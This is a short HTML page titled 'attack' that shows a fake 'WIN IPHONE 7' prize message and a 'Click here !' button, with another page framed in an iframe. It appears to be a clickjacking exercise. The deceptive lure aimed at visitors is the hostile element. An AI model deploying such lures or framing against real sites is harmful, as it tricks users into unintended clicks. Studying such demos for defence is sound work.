<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <link rel="stylesheet" href="attack.css">
    <title>attack</title>
</head>

<body>

    <div>
        <h1>WIN IPHONE 7</h1> 
        <label> Hi lucky user !!! you are 100
            <sup>th</sup> visitor to our site. </label>
        <br>
        <br>
        <br>
        <button>Click here !</button>
    </div>
    <iframe src="FilmyGossip.html"></iframe>
</body>

</html>